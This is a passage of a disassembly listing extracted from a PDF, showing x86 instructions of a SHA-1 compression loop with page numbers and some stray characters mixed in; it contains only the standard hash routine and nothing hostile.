CODE: D mov [esp+280h+var_4c8], eax
CODE: add ebx, [esp+280h+var_2e0]
CODE: ror edx, 2
CODE: B lea ebx, [ebx+eax+6ed9eba1h]
CODE:004028A2 mov [esp+280h+var_2e0], ebx
CODE:004028A6 mov eax, [esp+280h+var_4d0]
CODE:004028AD rol [esp+280h+var_2e0], 5
CODE:004028B2 xor eax, [esp+280h+var_4a4]
CODE:004028B9 add edi, [esp+280h+var_2e0]
CODE:004028BD xor eax, [esp+280h+var_4bc]
CODE:004028C4 mov [esp+280h+var_2e0], ecx
CODE:004028C8 xor eax, [esp+280h+var_4c4]
CODE:004028CF xor [esp+280h+var_2e0], edx
CODE:004028D3 rol eax, 1
CODE:004028D5 xor [esp+280h+var_2e0], ebp
CODE:004028D9 mov [esp+280h+var_4c4], eax
CODE:004028E0 add edi, [esp+280h+var_2e0]
CODE:004028E4 ror ecx, 2
CODE:004028E7 lea edi, [edi+eax+6ed9eba1h]
CODE:004028EE mov [esp+280h+var_2e0], edi
CODE:004028F2 mov eax, [esp+280h+var_4cc]
CODE:004028F9 rol [esp+280h+var_2e0], 5
CODE:004028FE xor eax, [esp+280h+_temp_buffer]
48 CODE: add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b8] CODE: mov [esp+280h+var_2e0], ebx CODE: xor eax, [esp+280h+var_4c0] CODE: B or [esp+280h+var_2e0], ecx CODE: F rol eax, 1 CODE: and [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4c0], eax CODE: C add ebp, eax CODE: E mov eax, ebx CODE: and eax, ecx CODE: or eax, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax-70e44324h] CODE: mov [esp+280h+var_2e0], ebp CODE: mov eax, [esp+280h+var_4c8] CODE: B rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4dc] CODE: add edx, [esp+280h+var_2e0] CODE: B xor eax, [esp+280h+var_4b4] CODE: mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4bc] CODE: D or [esp+280h+var_2e0], ebx CODE: rol eax, 1 CODE: and [esp+280h+var_2e0], ecx CODE: mov [esp+280h+var_4bc], eax CODE: E add edx, eax CODE: mov eax, edi CODE: and eax, ebx CODE: or eax, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: B lea edx, [edx+eax-70e44324h] CODE: mov [esp+280h+var_2e0], edx CODE: mov eax, [esp+280h+var_4c4] CODE: D rol [esp+280h+var_2e0], 5 CODE:004029A2 xor eax, [esp+280h+var_4d8] CODE:004029A9 add ecx, [esp+280h+var_2e0] CODE:004029AD xor eax, [esp+280h+var_4b0] CODE:004029B4 mov [esp+280h+var_2e0], ebp CODE:004029B8 xor eax, [esp+280h+var_4b8] CODE:004029BF or [esp+280h+var_2e0], edi CODE:004029C3 rol eax, 1 CODE:004029C5 and [esp+280h+var_2e0], ebx CODE:004029C9 mov [esp+280h+var_4b8], eax CODE:004029D0 add ecx, eax CODE:004029D2 mov eax, ebp CODE:004029D4 and eax, edi CODE:004029D6 or eax, [esp+280h+var_2e0] CODE:004029DA ror ebp, 2 CODE:004029DD lea ecx, [ecx+eax-70e44324h] CODE:004029E4 mov [esp+280h+var_2e0], ecx CODE:004029E8 mov eax, [esp+280h+var_4c0] CODE:004029EF rol [esp+280h+var_2e0], 5 CODE:004029F4 xor eax, [esp+280h+var_4d4] CODE:004029FB add ebx, [esp+280h+var_2e0] CODE:004029FF xor eax, [esp+280h+var_4ac] CODE:00402A06 mov [esp+280h+var_2e0], edx
49 CODE:00402A0A xor eax, [esp+280h+var_4b4] CODE:00402A11 or [esp+280h+var_2e0], ebp CODE:00402A15 rol eax, 1 CODE:00402A17 and [esp+280h+var_2e0], edi CODE:00402A1B mov [esp+280h+var_4b4], eax CODE:00402A22 add ebx, eax CODE:00402A24 mov eax, edx CODE:00402A26 and eax, ebp CODE:00402A28 or eax, [esp+280h+var_2e0] CODE:00402A2C ror edx, 2 CODE:00402A2F lea ebx, [ebx+eax-70e44324h] CODE:00402A36 mov [esp+280h+var_2e0], ebx CODE:00402A3A mov eax, [esp+280h+var_4bc] CODE:00402A41 rol [esp+280h+var_2e0], 5 CODE:00402A46 xor eax, [esp+280h+var_4d0] CODE:00402A4D add edi, [esp+280h+var_2e0] CODE:00402A51 xor eax, [esp+280h+var_4a8] CODE:00402A58 mov [esp+280h+var_2e0], ecx CODE:00402A5C xor eax, [esp+280h+var_4b0] CODE:00402A63 or [esp+280h+var_2e0], edx CODE:00402A67 rol eax, 1 CODE:00402A69 and [esp+280h+var_2e0], ebp CODE:00402A6D mov [esp+280h+var_4b0], eax CODE:00402A74 add edi, eax CODE:00402A76 mov eax, ecx CODE:00402A78 and eax, edx CODE:00402A7A or eax, [esp+280h+var_2e0] CODE:00402A7E ror ecx, 2 CODE:00402A81 lea edi, [edi+eax-70e44324h] CODE:00402A88 mov [esp+280h+var_2e0], edi CODE:00402A8C mov eax, [esp+280h+var_4b8] CODE:00402A93 rol [esp+280h+var_2e0], 5 CODE:00402A98 xor eax, [esp+280h+var_4cc] CODE:00402A9F add ebp, [esp+280h+var_2e0] CODE:00402AA3 xor eax, [esp+280h+var_4a4] CODE:00402AAA mov [esp+280h+var_2e0], ebx CODE:00402AAE xor eax, [esp+280h+var_4ac] CODE:00402AB5 or [esp+280h+var_2e0], ecx CODE:00402AB9 rol eax, 1 CODE:00402ABB and [esp+280h+var_2e0], edx CODE:00402ABF mov [esp+280h+var_4ac], eax CODE:00402AC6 add ebp, eax CODE:00402AC8 mov eax, ebx CODE:00402ACA and eax, ecx CODE:00402ACC or eax, [esp+280h+var_2e0] CODE:00402AD0 ror ebx, 2 CODE:00402AD3 lea ebp, [ebp+eax-70e44324h] CODE:00402ADA mov [esp+280h+var_2e0], ebp CODE:00402ADE mov eax, [esp+280h+var_4b4] CODE:00402AE5 rol [esp+280h+var_2e0], 5 CODE:00402AEA xor eax, [esp+280h+var_4c8] CODE:00402AF1 add edx, [esp+280h+var_2e0] CODE:00402AF5 xor eax, [esp+280h+_temp_buffer] 
CODE:00402AFC mov [esp+280h+var_2e0], edi CODE:00402B00 xor eax, [esp+280h+var_4a8] CODE:00402B07 or [esp+280h+var_2e0], ebx CODE:00402B0B rol eax, 1
50 CODE:00402B0D and [esp+280h+var_2e0], ecx CODE:00402B11 mov [esp+280h+var_4a8], eax CODE:00402B18 add edx, eax CODE:00402B1A mov eax, edi CODE:00402B1C and eax, ebx CODE:00402B1E or eax, [esp+280h+var_2e0] CODE:00402B22 ror edi, 2 CODE:00402B25 lea edx, [edx+eax-70e44324h] CODE:00402B2C mov [esp+280h+var_2e0], edx CODE:00402B30 mov eax, [esp+280h+var_4b0] CODE:00402B37 rol [esp+280h+var_2e0], 5 CODE:00402B3C xor eax, [esp+280h+var_4c4] CODE:00402B43 add ecx, [esp+280h+var_2e0] CODE:00402B47 xor eax, [esp+280h+var_4dc] CODE:00402B4E mov [esp+280h+var_2e0], ebp CODE:00402B52 xor eax, [esp+280h+var_4a4] CODE:00402B59 or [esp+280h+var_2e0], edi CODE:00402B5D rol eax, 1 CODE:00402B5F and [esp+280h+var_2e0], ebx CODE:00402B63 mov [esp+280h+var_4a4], eax CODE:00402B6A add ecx, eax CODE:00402B6C mov eax, ebp CODE:00402B6E and eax, edi CODE:00402B70 or eax, [esp+280h+var_2e0] CODE:00402B74 ror ebp, 2 CODE:00402B77 lea ecx, [ecx+eax-70e44324h] CODE:00402B7E mov [esp+280h+var_2e0], ecx CODE:00402B82 mov eax, [esp+280h+var_4ac] CODE:00402B89 rol [esp+280h+var_2e0], 5 CODE:00402B8E xor eax, [esp+280h+var_4c0] CODE:00402B95 add ebx, [esp+280h+var_2e0] CODE:00402B99 xor eax, [esp+280h+var_4d8] CODE:00402BA0 mov [esp+280h+var_2e0], edx CODE:00402BA4 xor eax, [esp+280h+_temp_buffer] CODE:00402BAB or [esp+280h+var_2e0], ebp CODE:00402BAF rol eax, 1 CODE:00402BB1 and [esp+280h+var_2e0], edi CODE:00402BB5 mov [esp+280h+_temp_buffer], eax CODE:00402BBC add ebx, eax CODE:00402BBE mov eax, edx CODE:00402BC0 and eax, ebp CODE:00402BC2 or eax, [esp+280h+var_2e0] CODE:00402BC6 ror edx, 2 CODE:00402BC9 lea ebx, [ebx+eax-70e44324h] CODE:00402BD0 mov [esp+280h+var_2e0], ebx CODE:00402BD4 mov eax, [esp+280h+var_4a8] CODE:00402BDB rol [esp+280h+var_2e0], 5 CODE:00402BE0 xor eax, [esp+280h+var_4bc] CODE:00402BE7 add edi, [esp+280h+var_2e0] CODE:00402BEB xor eax, [esp+280h+var_4d4] CODE:00402BF2 mov [esp+280h+var_2e0], ecx CODE:00402BF6 xor eax, [esp+280h+var_4dc] CODE:00402BFD or 
[esp+280h+var_2e0], edx CODE:00402C01 rol eax, 1 CODE:00402C03 and [esp+280h+var_2e0], ebp CODE:00402C07 mov [esp+280h+var_4dc], eax CODE:00402C0E add edi, eax
51 CODE:00402C10 mov eax, ecx CODE:00402C12 and eax, edx CODE:00402C14 or eax, [esp+280h+var_2e0] CODE:00402C18 ror ecx, 2 CODE:00402C1B lea edi, [edi+eax-70e44324h] CODE:00402C22 mov [esp+280h+var_2e0], edi CODE:00402C26 mov eax, [esp+280h+var_4a4] CODE:00402C2D rol [esp+280h+var_2e0], 5 CODE:00402C32 xor eax, [esp+280h+var_4b8] CODE:00402C39 add ebp, [esp+280h+var_2e0] CODE:00402C3D xor eax, [esp+280h+var_4d0] CODE:00402C44 mov [esp+280h+var_2e0], ebx CODE:00402C48 xor eax, [esp+280h+var_4d8] CODE:00402C4F or [esp+280h+var_2e0], ecx CODE:00402C53 rol eax, 1 CODE:00402C55 and [esp+280h+var_2e0], edx CODE:00402C59 mov [esp+280h+var_4d8], eax CODE:00402C60 add ebp, eax CODE:00402C62 mov eax, ebx CODE:00402C64 and eax, ecx CODE:00402C66 or eax, [esp+280h+var_2e0] CODE:00402C6A ror ebx, 2 CODE:00402C6D lea ebp, [ebp+eax-70e44324h] CODE:00402C74 mov [esp+280h+var_2e0], ebp CODE:00402C78 mov eax, [esp+280h+_temp_buffer] CODE:00402C7F rol [esp+280h+var_2e0], 5 CODE:00402C84 xor eax, [esp+280h+var_4b4] CODE:00402C8B add edx, [esp+280h+var_2e0] CODE:00402C8F xor eax, [esp+280h+var_4cc] CODE:00402C96 mov [esp+280h+var_2e0], edi CODE:00402C9A xor eax, [esp+280h+var_4d4] CODE:00402CA1 or [esp+280h+var_2e0], ebx CODE:00402CA5 rol eax, 1 CODE:00402CA7 and [esp+280h+var_2e0], ecx CODE:00402CAB mov [esp+280h+var_4d4], eax CODE:00402CB2 add edx, eax CODE:00402CB4 mov eax, edi CODE:00402CB6 and eax, ebx CODE:00402CB8 or eax, [esp+280h+var_2e0] CODE:00402CBC ror edi, 2 CODE:00402CBF lea edx, [edx+eax-70e44324h] CODE:00402CC6 mov [esp+280h+var_2e0], edx CODE:00402CCA mov eax, [esp+280h+var_4dc] CODE:00402CD1 rol [esp+280h+var_2e0], 5 CODE:00402CD6 xor eax, [esp+280h+var_4b0] CODE:00402CDD add ecx, [esp+280h+var_2e0] CODE:00402CE1 xor eax, [esp+280h+var_4c8] CODE:00402CE8 mov [esp+280h+var_2e0], ebp CODE:00402CEC xor eax, [esp+280h+var_4d0] CODE:00402CF3 or [esp+280h+var_2e0], edi CODE:00402CF7 rol eax, 1 CODE:00402CF9 and [esp+280h+var_2e0], ebx CODE:00402CFD mov [esp+280h+var_4d0], 
eax CODE:00402D04 add ecx, eax CODE:00402D06 mov eax, ebp CODE:00402D08 and eax, edi CODE:00402D0A or eax, [esp+280h+var_2e0]
52 CODE:00402D0E ror ebp, 2 CODE:00402D11 lea ecx, [ecx+eax-70e44324h] CODE:00402D18 mov [esp+280h+var_2e0], ecx CODE:00402D1C mov eax, [esp+280h+var_4d8] CODE:00402D23 rol [esp+280h+var_2e0], 5 CODE:00402D28 xor eax, [esp+280h+var_4ac] CODE:00402D2F add ebx, [esp+280h+var_2e0] CODE:00402D33 xor eax, [esp+280h+var_4c4] CODE:00402D3A mov [esp+280h+var_2e0], edx CODE:00402D3E xor eax, [esp+280h+var_4cc] CODE:00402D45 or [esp+280h+var_2e0], ebp CODE:00402D49 rol eax, 1 CODE:00402D4B and [esp+280h+var_2e0], edi CODE:00402D4F mov [esp+280h+var_4cc], eax CODE:00402D56 add ebx, eax CODE:00402D58 mov eax, edx CODE:00402D5A and eax, ebp CODE:00402D5C or eax, [esp+280h+var_2e0] CODE:00402D60 ror edx, 2 CODE:00402D63 lea ebx, [ebx+eax-70e44324h] CODE:00402D6A mov [esp+280h+var_2e0], ebx CODE:00402D6E mov eax, [esp+280h+var_4d4] CODE:00402D75 rol [esp+280h+var_2e0], 5 CODE:00402D7A xor eax, [esp+280h+var_4a8] CODE:00402D81 add edi, [esp+280h+var_2e0] CODE:00402D85 xor eax, [esp+280h+var_4c0] CODE:00402D8C mov [esp+280h+var_2e0], ecx CODE:00402D90 xor eax, [esp+280h+var_4c8] CODE:00402D97 or [esp+280h+var_2e0], edx CODE:00402D9B rol eax, 1 CODE:00402D9D and [esp+280h+var_2e0], ebp CODE:00402DA1 mov [esp+280h+var_4c8], eax CODE:00402DA8 add edi, eax CODE:00402DAA mov eax, ecx CODE:00402DAC and eax, edx CODE:00402DAE or eax, [esp+280h+var_2e0] CODE:00402DB2 ror ecx, 2 CODE:00402DB5 lea edi, [edi+eax-70e44324h] CODE:00402DBC mov [esp+280h+var_2e0], edi CODE:00402DC0 mov eax, [esp+280h+var_4d0] CODE:00402DC7 rol [esp+280h+var_2e0], 5 CODE:00402DCC xor eax, [esp+280h+var_4a4] CODE:00402DD3 add ebp, [esp+280h+var_2e0] CODE:00402DD7 xor eax, [esp+280h+var_4bc] CODE:00402DDE mov [esp+280h+var_2e0], ebx CODE:00402DE2 xor eax, [esp+280h+var_4c4] CODE:00402DE9 or [esp+280h+var_2e0], ecx CODE:00402DED rol eax, 1 CODE:00402DEF and [esp+280h+var_2e0], edx CODE:00402DF3 mov [esp+280h+var_4c4], eax CODE:00402DFA add ebp, eax CODE:00402DFC mov eax, ebx CODE:00402DFE and eax, ecx CODE:00402E00 
or eax, [esp+280h+var_2e0] CODE:00402E04 ror ebx, 2 CODE:00402E07 lea ebp, [ebp+eax-70e44324h] CODE:00402E0E mov [esp+280h+var_2e0], ebp
53 CODE:00402E12 mov eax, [esp+280h+var_4cc] CODE:00402E19 rol [esp+280h+var_2e0], 5 CODE:00402E1E xor eax, [esp+280h+_temp_buffer] CODE:00402E25 add edx, [esp+280h+var_2e0] CODE:00402E29 xor eax, [esp+280h+var_4b8] CODE:00402E30 mov [esp+280h+var_2e0], edi CODE:00402E34 xor eax, [esp+280h+var_4c0] CODE:00402E3B or [esp+280h+var_2e0], ebx CODE:00402E3F rol eax, 1 CODE:00402E41 and [esp+280h+var_2e0], ecx CODE:00402E45 mov [esp+280h+var_4c0], eax CODE:00402E4C add edx, eax CODE:00402E4E mov eax, edi CODE:00402E50 and eax, ebx CODE:00402E52 or eax, [esp+280h+var_2e0] CODE:00402E56 ror edi, 2 CODE:00402E59 lea edx, [edx+eax-70e44324h] CODE:00402E60 mov [esp+280h+var_2e0], edx CODE:00402E64 mov eax, [esp+280h+var_4c8] CODE:00402E6B rol [esp+280h+var_2e0], 5 CODE:00402E70 xor eax, [esp+280h+var_4dc] CODE:00402E77 add ecx, [esp+280h+var_2e0] CODE:00402E7B xor eax, [esp+280h+var_4b4] CODE:00402E82 mov [esp+280h+var_2e0], ebp CODE:00402E86 xor eax, [esp+280h+var_4bc] CODE:00402E8D or [esp+280h+var_2e0], edi CODE:00402E91 rol eax, 1 CODE:00402E93 and [esp+280h+var_2e0], ebx CODE:00402E97 mov [esp+280h+var_4bc], eax CODE:00402E9E add ecx, eax CODE:00402EA0 mov eax, ebp CODE:00402EA2 and eax, edi CODE:00402EA4 or eax, [esp+280h+var_2e0] CODE:00402EA8 ror ebp, 2 CODE:00402EAB lea ecx, [ecx+eax-70e44324h] CODE:00402EB2 mov [esp+280h+var_2e0], ecx CODE:00402EB6 mov eax, [esp+280h+var_4c4] CODE:00402EBD rol [esp+280h+var_2e0], 5 CODE:00402EC2 xor eax, [esp+280h+var_4d8] CODE:00402EC9 add ebx, [esp+280h+var_2e0] CODE:00402ECD xor eax, [esp+280h+var_4b0] CODE:00402ED4 mov [esp+280h+var_2e0], edx CODE:00402ED8 xor eax, [esp+280h+var_4b8] CODE:00402EDF or [esp+280h+var_2e0], ebp CODE:00402EE3 rol eax, 1 CODE:00402EE5 and [esp+280h+var_2e0], edi CODE:00402EE9 mov [esp+280h+var_4b8], eax CODE:00402EF0 add ebx, eax CODE:00402EF2 mov eax, edx CODE:00402EF4 and eax, ebp CODE:00402EF6 or eax, [esp+280h+var_2e0] CODE:00402EFA ror edx, 2 CODE:00402EFD lea ebx, [ebx+eax-70e44324h] 
CODE:00402F04 mov [esp+280h+var_2e0], ebx CODE:00402F08 mov eax, [esp+280h+var_4c0] CODE:00402F0F rol [esp+280h+var_2e0], 5 CODE:00402F14 xor eax, [esp+280h+var_4d4]
54 CODE:00402F1B add edi, [esp+280h+var_2e0] CODE:00402F1F xor eax, [esp+280h+var_4ac] CODE:00402F26 mov [esp+280h+var_2e0], ecx CODE:00402F2A xor eax, [esp+280h+var_4b4] CODE:00402F31 or [esp+280h+var_2e0], edx CODE:00402F35 rol eax, 1 CODE:00402F37 and [esp+280h+var_2e0], ebp CODE:00402F3B mov [esp+280h+var_4b4], eax CODE:00402F42 add edi, eax CODE:00402F44 mov eax, ecx CODE:00402F46 and eax, edx CODE:00402F48 or eax, [esp+280h+var_2e0] CODE:00402F4C ror ecx, 2 CODE:00402F4F lea edi, [edi+eax-70e44324h] CODE:00402F56 mov [esp+280h+var_2e0], edi CODE:00402F5A mov eax, [esp+280h+var_4bc] CODE:00402F61 rol [esp+280h+var_2e0], 5 CODE:00402F66 xor eax, [esp+280h+var_4d0] CODE:00402F6D add ebp, [esp+280h+var_2e0] CODE:00402F71 xor eax, [esp+280h+var_4a8] CODE:00402F78 mov [esp+280h+var_2e0], ebx CODE:00402F7C xor eax, [esp+280h+var_4b0] CODE:00402F83 xor [esp+280h+var_2e0], ecx CODE:00402F87 rol eax, 1 CODE:00402F89 xor [esp+280h+var_2e0], edx CODE:00402F8D mov [esp+280h+var_4b0], eax CODE:00402F94 add ebp, [esp+280h+var_2e0] CODE:00402F98 ror ebx, 2 CODE:00402F9B lea ebp, [ebp+eax-359d3e2ah] CODE:00402FA2 mov [esp+280h+var_2e0], ebp CODE:00402FA6 mov eax, [esp+280h+var_4b8] CODE:00402FAD rol [esp+280h+var_2e0], 5 CODE:00402FB2 xor eax, [esp+280h+var_4cc] CODE:00402FB9 add edx, [esp+280h+var_2e0] CODE:00402FBD xor eax, [esp+280h+var_4a4] CODE:00402FC4 mov [esp+280h+var_2e0], edi CODE:00402FC8 xor eax, [esp+280h+var_4ac] CODE:00402FCF xor [esp+280h+var_2e0], ebx CODE:00402FD3 rol eax, 1 CODE:00402FD5 xor [esp+280h+var_2e0], ecx CODE:00402FD9 mov [esp+280h+var_4ac], eax CODE:00402FE0 add edx, [esp+280h+var_2e0] CODE:00402FE4 ror edi, 2 CODE:00402FE7 lea edx, [edx+eax-359d3e2ah] CODE:00402FEE mov [esp+280h+var_2e0], edx CODE:00402FF2 mov eax, [esp+280h+var_4b4] CODE:00402FF9 rol [esp+280h+var_2e0], 5 CODE:00402FFE xor eax, [esp+280h+var_4c8] CODE: add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+_temp_buffer] CODE: mov [esp+280h+var_2e0], ebp CODE: xor eax, 
[esp+280h+var_4a8] CODE: B xor [esp+280h+var_2e0], edi CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: mov [esp+280h+var_4a8], eax CODE: C add ecx, [esp+280h+var_2e0]
55 CODE: ror ebp, 2 CODE: lea ecx, [ecx+eax-359d3e2ah] CODE: A mov [esp+280h+var_2e0], ecx CODE: E mov eax, [esp+280h+var_4b0] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4c4] CODE: add ebx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4dc] CODE: C mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4a4] CODE: xor [esp+280h+var_2e0], ebp CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4a4], eax CODE: add ebx, [esp+280h+var_2e0] CODE: C ror edx, 2 CODE: F lea ebx, [ebx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ebx CODE: A mov eax, [esp+280h+var_4ac] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4c0] CODE: D add edi, [esp+280h+var_2e0] CODE:004030A1 xor eax, [esp+280h+var_4d8] CODE:004030A8 mov [esp+280h+var_2e0], ecx CODE:004030AC xor eax, [esp+280h+_temp_buffer] CODE:004030B3 xor [esp+280h+var_2e0], edx CODE:004030B7 rol eax, 1 CODE:004030B9 xor [esp+280h+var_2e0], ebp CODE:004030BD mov [esp+280h+_temp_buffer], eax CODE:004030C4 add edi, [esp+280h+var_2e0] CODE:004030C8 ror ecx, 2 CODE:004030CB lea edi, [edi+eax-359d3e2ah] CODE:004030D2 mov [esp+280h+var_2e0], edi CODE:004030D6 mov eax, [esp+280h+var_4a8] CODE:004030DD rol [esp+280h+var_2e0], 5 CODE:004030E2 xor eax, [esp+280h+var_4bc] CODE:004030E9 add ebp, [esp+280h+var_2e0] CODE:004030ED xor eax, [esp+280h+var_4d4] CODE:004030F4 mov [esp+280h+var_2e0], ebx CODE:004030F8 xor eax, [esp+280h+var_4dc] CODE:004030FF xor [esp+280h+var_2e0], ecx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4dc], eax CODE: add ebp, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax-359d3e2ah] CODE: E mov [esp+280h+var_2e0], ebp CODE: mov eax, [esp+280h+var_4a4] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4b8] CODE: add edx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4d0] CODE: mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4d8] CODE: B xor [esp+280h+var_2e0], ebx CODE: F rol eax, 1
56 CODE: xor [esp+280h+var_2e0], ecx CODE: mov [esp+280h+var_4d8], eax CODE: C add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: lea edx, [edx+eax-359d3e2ah] CODE: A mov [esp+280h+var_2e0], edx CODE: E mov eax, [esp+280h+_temp_buffer] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4b4] CODE: add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4cc] CODE: C mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4d4] CODE: xor [esp+280h+var_2e0], edi CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], ebx CODE:004031A1 mov [esp+280h+var_4d4], eax CODE:004031A8 add ecx, [esp+280h+var_2e0] CODE:004031AC ror ebp, 2 CODE:004031AF lea ecx, [ecx+eax-359d3e2ah] CODE:004031B6 mov [esp+280h+var_2e0], ecx CODE:004031BA mov eax, [esp+280h+var_4dc] CODE:004031C1 rol [esp+280h+var_2e0], 5 CODE:004031C6 xor eax, [esp+280h+var_4b0] CODE:004031CD add ebx, [esp+280h+var_2e0] CODE:004031D1 xor eax, [esp+280h+var_4c8] CODE:004031D8 mov [esp+280h+var_2e0], edx CODE:004031DC xor eax, [esp+280h+var_4d0] CODE:004031E3 xor [esp+280h+var_2e0], ebp CODE:004031E7 rol eax, 1 CODE:004031E9 xor [esp+280h+var_2e0], edi CODE:004031ED mov [esp+280h+var_4d0], eax CODE:004031F4 add ebx, [esp+280h+var_2e0] CODE:004031F8 ror edx, 2 CODE:004031FB lea ebx, [ebx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ebx CODE: mov eax, [esp+280h+var_4d8] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4ac] CODE: add edi, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4c4] CODE: mov [esp+280h+var_2e0], ecx CODE: xor eax, [esp+280h+var_4cc] CODE: F xor [esp+280h+var_2e0], edx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebp CODE: mov [esp+280h+var_4cc], eax CODE: add edi, [esp+280h+var_2e0] CODE: ror ecx, 2 CODE: lea edi, [edi+eax-359d3e2ah] CODE: E mov [esp+280h+var_2e0], edi CODE: mov eax, [esp+280h+var_4d4] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4a8] CODE: add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4c0] CODE: mov [esp+280h+var_2e0], ebx
57 CODE: xor eax, [esp+280h+var_4c8] CODE: B xor [esp+280h+var_2e0], ecx CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4c8], eax CODE: C add ebp, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax-359d3e2ah] CODE: A mov [esp+280h+var_2e0], ebp CODE: E mov eax, [esp+280h+var_4d0] CODE:004032A5 rol [esp+280h+var_2e0], 5 CODE:004032AA xor eax, [esp+280h+var_4a4] CODE:004032B1 add edx, [esp+280h+var_2e0] CODE:004032B5 xor eax, [esp+280h+var_4bc] CODE:004032BC mov [esp+280h+var_2e0], edi CODE:004032C0 xor eax, [esp+280h+var_4c4] CODE:004032C7 xor [esp+280h+var_2e0], ebx CODE:004032CB rol eax, 1 CODE:004032CD xor [esp+280h+var_2e0], ecx CODE:004032D1 mov [esp+280h+var_4c4], eax CODE:004032D8 add edx, [esp+280h+var_2e0] CODE:004032DC ror edi, 2 CODE:004032DF lea edx, [edx+eax-359d3e2ah] CODE:004032E6 mov [esp+280h+var_2e0], edx CODE:004032EA mov eax, [esp+280h+var_4cc] CODE:004032F1 rol [esp+280h+var_2e0], 5 CODE:004032F6 xor eax, [esp+280h+_temp_buffer] CODE:004032FD add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b8] CODE: mov [esp+280h+var_2e0], ebp CODE: C xor eax, [esp+280h+var_4c0] CODE: xor [esp+280h+var_2e0], edi CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: D mov [esp+280h+var_4c0], eax CODE: add ecx, [esp+280h+var_2e0] CODE: ror ebp, 2 CODE: B lea ecx, [ecx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ecx CODE: mov eax, [esp+280h+var_4c8] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4dc] CODE: add ebx, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4b4] CODE: mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4bc] CODE: F xor [esp+280h+var_2e0], ebp CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4bc], eax CODE: add ebx, [esp+280h+var_2e0] CODE: ror edx, 2 CODE: lea ebx, [ebx+eax-359d3e2ah] CODE: E mov [esp+280h+var_2e0], ebx CODE: mov eax, [esp+280h+var_4c4] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4d8]
58 CODE: add edi, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b0] CODE:004033A0 mov [esp+280h+var_2e0], ecx CODE:004033A4 xor eax, [esp+280h+var_4b8] CODE:004033AB xor [esp+280h+var_2e0], edx CODE:004033AF rol eax, 1 CODE:004033B1 xor [esp+280h+var_2e0], ebp CODE:004033B5 mov [esp+280h+var_4b8], eax CODE:004033BC add edi, [esp+280h+var_2e0] CODE:004033C0 ror ecx, 2 CODE:004033C3 lea edi, [edi+eax-359d3e2ah] CODE:004033CA mov [esp+280h+var_2e0], edi CODE:004033CE mov eax, [esp+280h+var_4c0] CODE:004033D5 rol [esp+280h+var_2e0], 5 CODE:004033DA xor eax, [esp+280h+var_4d4] CODE:004033E1 add ebp, [esp+280h+var_2e0] CODE:004033E5 xor eax, [esp+280h+var_4ac] CODE:004033EC mov [esp+280h+var_2e0], ebx CODE:004033F0 xor eax, [esp+280h+var_4b4] CODE:004033F7 xor [esp+280h+var_2e0], ecx CODE:004033FB rol eax, 1 CODE:004033FD xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4b4], eax CODE: add ebp, [esp+280h+var_2e0] CODE: C ror ebx, 2 CODE: F lea ebp, [ebp+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ebp CODE: A mov eax, [esp+280h+var_4bc] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4d0] CODE: D add edx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4a8] CODE: mov [esp+280h+var_2e0], edi CODE: C xor eax, [esp+280h+var_4b0] CODE: xor [esp+280h+var_2e0], ebx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ecx CODE: D mov [esp+280h+var_4b0], eax CODE: add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: B lea edx, [edx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], edx CODE: mov eax, [esp+280h+var_4b8] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4cc] CODE: add ecx, [esp+280h+var_2e0] CODE: D xor eax, 